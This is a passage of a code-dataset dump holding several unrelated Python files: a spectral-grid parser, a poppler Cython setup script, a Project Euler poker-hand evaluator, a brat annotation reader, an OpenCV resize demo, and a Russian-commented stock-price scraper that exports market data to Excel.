' lines found\\n')\n\n lines_split = []\n for l in lines:\n separate = l.rstrip().split()\n if (len(separate)<2):\n raise NameError(fname + ': cannot split line, ' + l + '\\n')\n lines_split.append(separate)\n\n # Recover items that will be the keys and check if all provided\n\n keys_required = ['addmodel', 'name', 'method', 'initial',\n 'delta', 'minimum', 
'bottom', 'top',\n 'maximum', 'numbvals', 'value']\n keys = []\n for item in lines_split:\n keys.append(item[0].lower())\n\n if not (set(keys) == set(keys_required)):\n raise NameError(fname + ': missing entry, required keys: ',\n keys_required)\n\n userdict = {}\n for item in lines_split:\n if ('numbval' in item[0].lower()):\n userdict[item[0].lower()] = [ int(float(i))\n for i in item[1:] ]\n elif ('addmodel' in item[0].lower()):\n userdict[item[0].lower()] = bool(item[1])\n elif ('name' in item[0].lower()) or ('unit' in item[0].lower()):\n userdict[item[0].lower()] = item[1:]\n else:\n userdict[item[0].lower()] = [ float(i) for i in item[1:] ]\n\n if ( len(userdict['value']) != np.sum(userdict['numbvals']) ):\n raise NameError(fname +\n ': numbvals and value entries do not match\\n')\n\n return userdict\n\n\ndef get_paramval(arrays):\n# Find combinations of model paramaters corresponding to the input\n# spectra, needed for extension spectra\n#\n# :rtype: list of tuples, each tuple contains a combination of model\n# parameters corresponding to one of the input grid spectrum.\n# :param arrays: list of tuples, each tuple contains grid values of\n# model parameters, not padded with 0\n#\n arrays = [np.asarray(a) for a in arrays]\n shape = (len(x) for x in arrays)\n\n tmp = np.indices(shape, dtype=int)\n ix = tmp.reshape(len(arrays), -1).T\n out = tmp.reshape(len(arrays), -1).T.astype('float')\n \n for n, arr in enumerate(arrays):\n out[:, n] = arrays[n][ix[:, n]]\n\n param_combinations = []\n for item in out:\n param_combinations.append(tuple(item))\n \n return param_combinations\n\n\ndef read_input_spectra(fname, numbvals):\n# Read grid of model spectra from the file\n#\n# :rtype: list of tuples containing model spectra.\n#\n# :param fname: name of the file containing the grid of model spectra.\n# :param numbvals: list with total grid number of model parameters.\n \n d = np.loadtxt(fname)\n parameter_combinations = np.prod(numbvals)\n numspectra = len(d.T)-1\n # spectra in columns, 1st column is energy grid, skip it\n if ( numspectra != parameter_combinations ):\n raise NameError(fname + ': No. of spectra ' +\n np.str(numspectra) +\n ', different from declared param combinations '\n + np.str(parameter_combinations) + '\\n')\n input_spectra = []\n for i in range( len(d.T)-1 ):\n # d[:-1] - match no. of energy bins;\n # T[1:] - skip the 1st column with energy vector\n input_spectra.append(tuple(d[:-1].T[1:][i]))\n\n return input_spectra\n\n\n\n# ------------- miscellaneous -----------\n\n'''\n \ndef generate_spectra():\n# Tool to generate a grid of test spectra and test parameter file\n\n energy = np.linspace(0.5, 10., 30) # adjust to generate\n par1 = np.linspace(1., 3., 5) # parameter 1\n par2 = np.linspace(2., 50., 9) # parameter 2\n\n # Uncomment the following 7 lines, enter your model expression\n #spec = [energy]\n #for p1 in par1:\n # for p2 in par2:\n # tmp = < model expression >\n # spec.append(tmp)\n #\n #np.savetxt('specfile_test.txt', np.array(spec).T, fmt='%10.4f' )\n\n f = open('userparams_test.txt', 'w+')\n\n f.write('addmodel True\\n')\n f.write('name par1 par2\\n')\n f.write('method 0. 
0.\\n')\n f.write('top ' + np.str(par1[-1]) + ' ' + np.str(par2[-1]) + '\\n')\n f.write('maximum ' + np.str(par1[-1]) + ' ' + np.str(par2[-1]) +\n '\\n')\n f.write('bottom ' + np.str(par1[0]) + ' ' + np.str(par2[0]) + '\\n')\n f.write('minimum ' + np.str(par1[0]) + ' ' + np.str(par2[0]) + '\\n')\n f.write('initial ' + np.str(par1.mean()) + ' ' +\n np.str(par2.mean()) + '\\n')\n # update the definition of delta is required\n f.write('delta ' + np.str( (par1[1:] - par1[:-1]).min()/5. ) + ' ' +\n np.str( (par2[1:] - par2[:-1]).min()/5. ) + '\\n')\n f.write('numbvals ' + np.str(len(par1)) + ' ' + np.str(len(par2)) +\n '\\n')\n\n par1vals = ''\n for p1 in par1:\n par1vals += np.str(p1) + ' '\n\n par2vals = ''\n for p2 in par2:\n par2vals += np.str(p2) + ' '\n\n f.write('value ' + par1vals + par2vals + '\\n')\n\n f.close()\n\n return\n\n'''\n\n\n","repo_name":"malgosias/2015-12-16-code-sample-3","sub_path":"tabmod.py","file_name":"tabmod.py","file_ext":"py","file_size_in_byte":12735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4391274669","text":"from __future__ import print_function\n\nimport sys\nfrom distutils.core import setup, Extension\n\ntry:\n from Cython.Build import cythonize\n\nexcept ImportError:\n print('You need to install cython first - sudo pip install cython', file=sys.stderr)\n sys.exit(1)\n\npoppler_ext = Extension('poppler', ['poppler.pyx'], language='c++',\n extra_compile_args=[],\n include_dirs=[\n \"/usr/include/poppler\",\n ],\n libraries=['poppler'])\nsetup(name='poppler',\n version='0.2',\n ext_modules=cythonize(poppler_ext))\n","repo_name":"oclay1st/Alexandria","sub_path":"backend/alexandria/modules/utils/parsers/pdf/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23963090676","text":"#https://codereview.stackexchange.com/questions/225119/project-euler-54-poker-hands-in-python\r\n#Thanks to SylvainD for the below code: git profile link: https://codereview.stackexchange.com/users/9452/sylvaind\r\n\r\nimport collections\r\nimport os\r\n\r\n\r\nclass Card:\r\n \"\"\"Card object (value and suit).\"\"\"\r\n CARD_VALUES = {\r\n '2': 2,\r\n '3': 3,\r\n '4': 4,\r\n '5': 5,\r\n '6': 6,\r\n '7': 7,\r\n '8': 8,\r\n '9': 9,\r\n 'T': 10,\r\n 'J': 11,\r\n 'Q': 12,\r\n 'K': 13,\r\n 'A': 14\r\n }\r\n\r\n def __init__(self, value, suit):\r\n self.value = value\r\n self.suit = suit\r\n\r\n @classmethod\r\n def from_string(cls, card):\r\n value, suit = card\r\n return cls(value, suit)\r\n\r\n def __str__(self):\r\n return str(self.value) + self.suit\r\n\r\n def __repr__(self):\r\n return self.__class__.__name__ + \"(\" + self.value + \", \" + self.suit + \")\"\r\n\r\n def evaluate(self):\r\n return Card.CARD_VALUES[self.value]\r\n\r\n\r\nclass Hand:\r\n \"\"\"Hand object (iterable of NB_CARDS cards).\"\"\"\r\n NB_CARDS = 5\r\n\r\n def __init__(self, cards):\r\n assert len(cards) == Hand.NB_CARDS\r\n self.cards = cards\r\n\r\n @classmethod\r\n def from_string(cls, string):\r\n cards = [Card.from_string(chunk) for chunk in string.split()]\r\n return cls(cards[:Hand.NB_CARDS]), cls(cards[Hand.NB_CARDS:])\r\n\r\n def __str__(self):\r\n return \"-\".join(str(c) for c in self.cards)\r\n\r\n def __repr__(self):\r\n return self.__class__.__name__ + \"(\" + repr(self.cards) + \")\"\r\n\r\n def evaluate(self):\r\n \"\"\"Return an arbitrarly formed tuple that can be used to\r\n sort hands using 
lexicographic order. First element is an\r\n integer describing the type of hand. Other values are added\r\n to be able to differentiate hands.\r\n\r\n Integers used:\r\n 1 High Card: Highest value card.\r\n 2 One Pair: Two cards of the same value.\r\n 3 Two Pairs: Two different pairs.\r\n 4 Three of a Kind: Three cards of the same value.\r\n 5 Straight: All cards are consecutive values.\r\n 6 Flush: All cards of the same suit.\r\n 7 Full House: Three of a kind and a pair.\r\n 8 Four of a Kind: Four cards of the same value.\r\n 9 Straight Flush: All cards are consecutive values of same suit.\r\n 9 Royal Flush: Ten, Jack, Queen, King, Ace, in same suit.\r\n \"\"\"\r\n values = sorted((c.evaluate() for c in self.cards), reverse=True)\r\n count = collections.Counter(values)\r\n mc, mc2 = count.most_common(2)\r\n mc_val, mc_nb = mc\r\n mc2_val, mc2_nb = mc2\r\n if mc_nb == 4:\r\n return (8, mc_val, values)\r\n elif mc_nb == 3:\r\n if mc2_nb == 2:\r\n return (7, mc_val, mc2_val, values)\r\n else:\r\n return (4, mc_val, values)\r\n elif mc_nb == 2:\r\n if mc2_nb == 2:\r\n return (3, sorted((mc_val, mc2_val)), values)\r\n else:\r\n return (2, mc_val, values)\r\n else:\r\n assert mc_nb == 1\r\n is_flush = len(set(c.suit for c in self.cards)) == 1\r\n delta = values[0] - values[-1]\r\n is_straight = delta == Hand.NB_CARDS - 1\r\n if is_straight:\r\n return (9 if is_flush else 5, values)\r\n else:\r\n return (6 if is_flush else 1, values)\r\n\r\n def __gt__(self, other): # Note: other magic methods should be defined as well\r\n return self.evaluate() > other.evaluate()\r\n\r\ndef euler54(f='p054_poker.txt'):\r\n \"\"\"Solution for problem 54.\"\"\"\r\n resource_folder = ''\r\n res = [] #Winning Lines\r\n res_ = [] #Losing Lines\r\n\r\n with open(os.path.join(resource_folder, f)) as file_:\r\n contents = file_.read().splitlines()\r\n file_.seek(0)\r\n for i in range(len(contents)):\r\n hand1, hand2 = Hand.from_string(contents[i])\r\n if hand1 > hand2:\r\n if contents[i][-1] == '\\n':\r\n res.append((contents[i][:-1], i))\r\n else:\r\n res.append((contents[i], i))\r\n \r\n else:\r\n if contents[i][-1] == '\\n':\r\n res_.append((contents[i][:-1], i))\r\n else:\r\n res_.append((contents[i], i))\r\n # print(i)\r\n return res, res_\r\n","repo_name":"Vivojay/Poker-CLI","sub_path":"compare_hands.py","file_name":"compare_hands.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42346101363","text":"from itertools import chain\nfrom lxml import etree\nfrom bratreader.event import Event\n\n\nclass AnnotatedDocument(object):\n \"\"\"Represent a document in a Brat Corpus.\"\"\"\n\n def __init__(self, key, sentences, text):\n \"\"\"\n Create a brat document.\n\n :param key: (string) The key of the document.\n Generally the name of the file without the extension\n (e.g. 
\"022.ann\" becomes 022)\n :param sentences: A list of dictionaries containing words.\n Represents the text of the review on a word-by-word basis.\n :return: None\n \"\"\"\n self.key = key\n\n self.sentences = sentences\n annotations = [chain.from_iterable([w.annotations for w in x.words])\n for x in sentences]\n self.annotations = list(chain.from_iterable(annotations))\n\n events = []\n eID = 0\n for idx in range(len(self.annotations)):\n annT = self.annotations[idx]\n sent = self.sentences[annT.words[0].sentkey]\n line = sent.line\n b, e = annT.spans[0]\n b, e = b-sent.start, e-sent.start\n if (annT.type == 'E'):\n #print('\\neT: \\t' + annT.label +'\\t'+ annT.repr +'\\t'+ line[b:e] +'\\t', [b, e])\n args = list()\n args_spans = list()\n args_labels = list()\n for idx_arg in range(len(annT.args)):\n arg = annT.args[idx_arg]\n #print(int(arg), len(self.annotations))\n annArg = self.annotations[int(arg)-1]\n ba, ea = annArg.realspan\n ba, ea = ba-sent.start, ea-sent.start# the args are in the same line with trigger!!\n args.append(annArg.repr)\n args_spans.append([ba,ea])\n args_labels.append(annArg.label)\n #print('eA' + str(idx_arg)+ ':\\t'+ annArg.label +'\\t'+ annArg.repr +'\\t'+ line[ba:ea] +'\\t', (ba, ea))\n events.append(Event(eID, line, annT.repr, [b, e], annT.label, args, args_spans, args_labels))\n eID = eID + 1\n self.events = events\n\n self.text = text\n\n def __repr__(self):\n \"\"\"Representation of the AnnotatedDocument.\"\"\"\n temp_ann = 'AnnotatedDocument:'\n # elements in sentences\n temp_ann = temp_ann + '\\n\\nkey:\\n' + str(self.key)\n temp_ann = temp_ann + '\\n\\ntext:\\n' + self.text\n temp_ann = temp_ann + '\\n\\nAnnotations:'\n ind = 0\n for ann in self.annotations:\n temp_ann = temp_ann + '\\nann[' + str(ind) + ']:' + str(ann)\n ind = ind + 1\n temp_ann = temp_ann + '\\n\\nEvents:'\n ind = 0\n for event in self.events:\n temp_ann = temp_ann + '\\nevent[' + str(ind) + ']:' + str(event)\n ind = ind + 1\n temp_ann = temp_ann + '\\n\\nSentences:'\n ind = 0\n for sent in self.sentences:\n temp_ann = temp_ann + '\\nsent[' + str(ind) + ']:' + str(sent)\n ind = ind + 1\n return \"{0}\\n\".format(temp_ann)\n\n\n def getlabelinspan(self, start, end):\n \"\"\"\n Retrieve all labels in the specified character span.\n\n :param start: The start index in characters.\n :param end: The end index in characters.\n :return a list of labels that fall inside the span.\n \"\"\"\n return [list(ann.labels.keys())[0] for ann in self.annotations if\n (ann.spans[0][0] <= start < ann.spans[-1][1])\n or (ann.spans[0][0] < end <= ann.spans[-1][1])\n or (start < ann.spans[0][0] < end and start < ann.spans[-1][1] < end)]\n\n\n\n def export_xml(self, pathtofile):\n \"\"\"\n Export the current document to an XML file at the specified location.\n\n :param pathtofile: The path where the .XML file needs to be saved.\n :return: None\n \"\"\"\n document = etree.Element(\"document\", source=self.key)\n\n sentences = etree.Element(\"sentences\")\n for s in self.sentences:\n\n sentence = etree.Element(\"sentence\", id=\"s.{0}\".format(s.key),\n start=str(s.start),\n end=str(s.end))\n\n for w in s.words:\n\n word = etree.Element(\"word\",\n start=str(w.start),\n end=str(w.end),\n id=\"s.{0}.w.{1}\".format(w.sentkey, w.key))\n word.text = w.form\n sentence.append(word)\n\n sentences.append(sentence)\n\n document.append(sentences)\n\n annotations = etree.Element(\"annotations\")\n\n for v in self.annotations:\n\n annotations.append(etree.Element(\"annotation\",\n id=str(\"ann{0}\".format(v.id))))\n ann = 
annotations.getchildren()[-1]\n\n ann.set(\"words\", u\" \".join([\"s.{0}.w.{1}\".format(w.sentkey, w.key)\n for w in v.words]))\n ann.set(\"repr\", v.repr)\n ann.set(\"spans\", u\",\".join([\"|\".join([str(y) for y in x])\n for x in v.spans]))\n\n for label, valency in v.labels.items():\n ann.set(str(label), \"|\".join(valency))\n\n for linktype, linked in v.links.items():\n\n linked = u\" \".join([\"ann{0}\".format(link.id) for link in linked])\n ann.set(str(\"link.{0}\".format(linktype)), linked)\n\n document.append(annotations)\n\n with open(pathtofile, 'wb') as f:\n etree.ElementTree(document).write(f, encoding=\"utf-8\", xml_declaration=True, pretty_print=True)\n","repo_name":"WePDLA/Delta","sub_path":"brat/bratreader/annotateddocument.py","file_name":"annotateddocument.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23286932191","text":"import cv2 as cv\n\ndef rescaleFrame(frame,scale = 0.75):\n #images,videos and live video\n width = int(frame.shape[1] * scale)\n height = int(frame.shape[0] * scale)\n\n dimensions = (width,height)\n\n return cv.resize(frame,dimensions,interpolation=cv.INTER_AREA)\n\ndef change_res(width,height):\n #it will change for live video only\n capture.set(3,width)\n capture.set(4,height)\n\n#reading videos\ncapture = cv.VideoCapture('videos/video1.mp4')\nf = 1\nwhile True:\n #Getting the frame\n isTrue, frame = capture.read()\n #cv.imshow('Video',frame)\n #Getting a rescaled frame\n new_frame = rescaleFrame(frame,f)\n f = f+0.001\n cv.imshow('small video',new_frame)\n #When d is pressed the video exits\n if cv.waitKey(20) & 0xFF == ord('d'):\n break\ncapture.release()\ncv.destroyAllWindows()\n\n","repo_name":"DeVcB13d/OpenCV_Tut","sub_path":"2_Resize.py","file_name":"2_Resize.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15864221511","text":"#!/usr/bin/env python3\nimport eel\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport datetime\nimport time\nfrom datetime import date\n\n\n# Инициализация приложения при помощи библиотеки eel\neel.init(\"web\")\n\n# User-Agent, чтобы сайт не заблокировал доступ, думая, что это робот\nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}\n\n# Страницы, с которых будет браться информация\nPromotions_Tesla = 'https://ru.investing.com/equities/tesla-motors'\nPromotions_Nissan = 'https://ru.investing.com/equities/nissan-motor-co.,-ltd.'\nPromotions_AMD = 'https://www.investing.com/equities/adv-micro-device'\nPromotions_Intel = 'https://ru.investing.com/equities/intel-corp'\nPromotions_Apple = 'https://www.investing.com/equities/apple-computer-inc'\nPromotions_IBM = 'https://www.investing.com/equities/ibm'\nPromotions_Microsoft = 'https://www.investing.com/equities/microsoft-corp'\nPromotions_Yandex = 'https://www.investing.com/equities/yandex'\nPromotions_Google = 'https://ru.investing.com/equities/google-inc'\nPromotions_Facebook = 'https://www.investing.com/equities/facebook-inc'\nPromotions_GM = 'https://ru.investing.com/equities/gen-motors'\nPromotions_Ford = 'https://ru.investing.com/equities/ford-motor-co'\nPromotions_Daimler = 'https://ru.investing.com/equities/daimler'\nPromotions_EA = 'https://ru.investing.com/equities/electronic-arts-inc'\nPromotions_Huawei = 
'https://www.investing.com/equities/huawei-culture'\n# Параметры сбора данных, запись их в переменные\nparcer = 'html.parser'\ntype = \"span\" # По какому элементу искать\nklasse = \"class\" # По какому классу искать\n\n\n# Раздел с IT-компаниями\n@eel.expose # При нажатии кнопки в приложении, JavaScript вызывает функцию тут, в Python\ndef check_AMD():\n full_page = requests.get(Promotions_AMD, headers=headers) # При помощи библиотеки requests делается запрос на сайт\n soup = BeautifulSoup(full_page.content, parcer) # При помощи библиотеки BeautifulSoup парсится страница\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-8274-last\"}) # Поиск значения по указанным критериям\n output = convert[0].text # Это значение конвертируется\n return output # Идет возвращение полученного значения\n\n# И так по аналогии\n@eel.expose\ndef check_Intel():\n full_page = requests.get(Promotions_Intel, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-251-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Apple():\n full_page = requests.get(Promotions_Apple, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-6408-last\"})\n output = convert[0].text\n print(output)\n return output\n\n@eel.expose\ndef check_IBM():\n full_page = requests.get(Promotions_IBM, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-8082-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Microsoft():\n full_page = requests.get(Promotions_Microsoft, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-252-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Google():\n full_page = requests.get(Promotions_Google, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-6369-last\"})\n output = convert[0].text.replace(\".\", \"\").replace(\",\", \".\")\n return output\n\n@eel.expose\ndef check_Facebook():\n full_page = requests.get(Promotions_Facebook, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-26490-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_EA():\n full_page = requests.get(Promotions_EA, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-6472-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Yandex():\n full_page = requests.get(Promotions_Yandex, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-13999-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Huawei():\n full_page = requests.get(Promotions_Huawei, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(type, {klasse: \"arial_26 inlineblock pid-944369-last\"})\n output = convert[0].text\n return output\n\n# Тестирование получение исторических значений акций\n@eel.expose\ndef check_gap_Apple():\n History_Apple = 
'https://ru.investing.com/equities/apple-computer-inc-historical-data'\n full_page = requests.get(History_Apple, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_price = soup.findAll(\"td\", {\"class\": \"greenFont\"})\n for total in range(0, 20, 2):\n price = convert_price[total].text\n print(price)\n\n# Раздел с автопроизводителями\n@eel.expose\ndef check_Tesla():\n full_page = requests.get(Promotions_Tesla, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-13994-last\"})\n output = convert[0].text.replace(\".\", \"\").replace(\",\", \".\")\n return output\n\n@eel.expose\ndef check_Nissan():\n full_page = requests.get(Promotions_Nissan, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-44127-last\"})\n output = convert[0].text\n return output\n\n@eel.expose\ndef check_Ford():\n full_page = requests.get(Promotions_Ford, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-255-last\"})\n output = convert[0].text\n return output\n\n\n# Упаковка в Excel-файл через библиотеку Pandas\n# Функция с автопроизводителями\n@eel.expose\ndef start_Pandas_Auto():\n # Текст, который используется в процессе работы\n progress_bar = 'Progress: '\n packing = 'Packing into file...'\n sheet_name = 'Данные рынка на '\n prom_now = \"Текущая стоимость акций \"\n prom_day_max = 'Дневной максимум '\n prom_day_min = 'Дневной минимум '\n\n print(progress_bar + '1/5') # Счетчик прогесса\n full_page = requests.get(Promotions_Tesla, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_tesla = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-13994-last\"})\n convert_min_tesla = soup.findAll(\"span\", {\"class\": \"inlineblock pid-13994-low\"})\n convert_max_tesla = soup.findAll(\"span\", {\"class\": \"inlineblock pid-13994-high\"})\n time.sleep(1)\n\n print(progress_bar + '2/5')\n full_page = requests.get(Promotions_Nissan, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_nissan = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-44127-last\"})\n convert_min_nissan = soup.findAll(\"span\", {\"class\": \"inlineblock pid-44127-low\"})\n convert_max_nissan = soup.findAll(\"span\", {\"class\": \"inlineblock pid-44127-high\"})\n time.sleep(1)\n\n print(progress_bar + '3/5')\n full_page = requests.get(Promotions_GM, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_gm = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-239-last\"})\n convert_min_gm = soup.findAll(\"span\", {\"class\": \"inlineblock pid-239-low\"})\n convert_max_gm = soup.findAll(\"span\", {\"class\": \"inlineblock pid-239-high\"})\n time.sleep(1)\n\n print(progress_bar + '4/5')\n full_page = requests.get(Promotions_Ford, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_ford = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-255-last\"})\n convert_min_ford = soup.findAll(\"span\", {\"class\": \"inlineblock pid-255-low\"})\n convert_max_ford = soup.findAll(\"span\", {\"class\": \"inlineblock pid-255-high\"})\n time.sleep(1)\n\n print(progress_bar + '5/5')\n full_page = requests.get(Promotions_Daimler, headers=headers)\n soup = BeautifulSoup(full_page.content, 
'html.parser')\n convert_daimler = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-355-last\"})\n convert_min_daimler = soup.findAll(\"span\", {\"class\": \"inlineblock pid-355-low\"})\n convert_max_daimler = soup.findAll(\"span\", {\"class\": \"inlineblock pid-355-high\"})\n time.sleep(1)\n\n hms = datetime.datetime.today() # Дата и время\n print(hms.hour, hms.minute, hms.second)\n time_flow = hms.hour, hms.minute, hms.second # Форматирование в формат времени\n print(packing)\n # Шаблон данных\n data = [\n [prom_now + str(\"Tesla\"), convert_tesla[0].text], # Текущая стоимость акций + актуальное значение\n [prom_day_min, convert_min_tesla[0].text], # Дневной минимум\n [prom_day_max, convert_max_tesla[0].text], # Дневной максимум\n [\" \", \" \"], # Отступ\n [prom_now + str(\"Nissan\"), convert_nissan[0].text],\n [prom_day_min, convert_min_nissan[0].text],\n [prom_day_max, convert_max_nissan[0].text],\n [\" \", \" \"],\n [prom_now + str(\"General Motors\"), convert_gm[0].text],\n [prom_day_min, convert_min_gm[0].text],\n [prom_day_max, convert_max_gm[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Ford\"), convert_ford[0].text],\n [prom_day_min, convert_min_ford[0].text],\n [prom_day_max, convert_max_ford[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Daimler\"), convert_daimler[0].text],\n [prom_day_min, convert_min_daimler[0].text],\n [prom_day_max, convert_max_daimler[0].text],\n ]\n\n today = date.today() # Текущая дата\n direction = 'Сarmakers_' # Название файла\n time_now = datetime.datetime.time(datetime.datetime.now()) # Текущее время\n new_data = pd.DataFrame(data).rename_axis(None, axis=1) # Создание датафрейма\n file_name = str(direction) + str(today) + '-' + str(time_flow) # Имя файла\n file_directory = file_name + '.xlsx' # Добавление Excel-расширения к файлу\n new_data.style.hide_index() # Индексы не будут показываться\n # Дальнейшая кастомизация через xlsxwriter\n writer = pd.ExcelWriter(file_directory, engine='xlsxwriter')\n new_data.to_excel(writer, sheet_name=str(sheet_name) + str(today), index=False)\n\n workbook = writer.book\n worksheet = writer.sheets[str(sheet_name) + str(today)]\n # Параметры данных в файле\n format_list = workbook.add_format({'border': 0, 'num_format': 'hh:mm:ss', 'size': 14, 'align': 'center'}) # Параметры формата чисел, размер шрифта, позиционирование по центру\n date_format = workbook.add_format({'num_format': 'mm.dd.yyyy'}) # Формат даты\n worksheet.write('A1', time_now, format_list) # Добавление в столбец А1 текущего времени\n worksheet.write('B1', today, date_format) # Добавление в столбец B1 текущей даты\n format = workbook.add_format({'align': 'left'})\n\n worksheet.set_landscape() # Ориентация по умолчанию\n # Параметры стобцов\n worksheet.set_column('A:A', 40, format)\n worksheet.set_column('B:B', 20, format)\n\n writer.save() # Сохранение получившегося файла\n print('\\n''Файл с названием ' + str(direction) + str(today) + '-' + str(time_flow) + ' сохранен') # Сообщение о сохранении\n\n\n# Функция с IT-компаниями\n@eel.expose\ndef start_Pandas_IT():\n\n progress_bar = 'Progress: '\n packing = 'Packing into file...'\n sheet_name = 'Данные рынка на '\n prom_now = \"Текущая стоимость акций \"\n prom_day_max = 'Дневной максимум '\n prom_day_min = 'Дневной минимум '\n\n full_page = requests.get(Promotions_AMD, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_amd = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-8274-last\"})\n convert_min_amd = soup.findAll(\"span\", {\"class\": \"inlineblock pid-8274-low\"})\n convert_max_amd = soup.findAll(\"span\", {\"class\": \"inlineblock pid-8274-high\"})\n print(progress_bar + '1/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Intel, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_intel = soup.findAll(\"span\", {\"class\": \"arial_26 
inlineblock pid-251-last\"})\n convert_min_intel = soup.findAll(\"span\", {\"class\": \"inlineblock pid-251-low\"})\n convert_max_intel = soup.findAll(\"span\", {\"class\": \"inlineblock pid-251-high\"})\n print(progress_bar + '2/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Apple, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_apple = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-6408-last\"})\n convert_min_apple = soup.findAll(\"span\", {\"class\": \"inlineblock pid-6408-low\"})\n convert_max_apple = soup.findAll(\"span\", {\"class\": \"inlineblock pid-6408-high\"})\n print(progress_bar + '3/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_IBM, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_ibm = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-8082-last\"})\n convert_min_ibm = soup.findAll(\"span\", {\"class\": \"inlineblock pid-8082-low\"})\n convert_max_ibm = soup.findAll(\"span\", {\"class\": \"inlineblock pid-8082-high\"})\n print(progress_bar + '4/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Microsoft, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_microsoft = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-252-last\"})\n convert_min_microsoft = soup.findAll(\"span\", {\"class\": \"inlineblock pid-252-low\"})\n convert_max_microsoft = soup.findAll(\"span\", {\"class\": \"inlineblock pid-252-high\"})\n print(progress_bar + '5/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Google, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_google = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-6369-last\"})\n convert_min_google = soup.findAll(\"span\", {\"class\": \"inlineblock pid-6369-low\"})\n convert_max_google = soup.findAll(\"span\", {\"class\": \"inlineblock pid-6369-high\"})\n print(progress_bar + '6/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Facebook, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_facebook = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-26490-last\"})\n convert_min_facebook = soup.findAll(\"span\", {\"class\": \"inlineblock pid-26490-low\"})\n convert_max_facebook = soup.findAll(\"span\", {\"class\": \"inlineblock pid-26490-high\"})\n print(progress_bar + '7/8')\n time.sleep(1)\n\n full_page = requests.get(Promotions_Yandex, headers=headers)\n soup = BeautifulSoup(full_page.content, 'html.parser')\n convert_yandex = soup.findAll(\"span\", {\"class\": \"arial_26 inlineblock pid-13999-last\"})\n convert_min_yandex = soup.findAll(\"span\", {\"class\": \"inlineblock pid-13999-low\"})\n convert_max_yandex = soup.findAll(\"span\", {\"class\": \"inlineblock 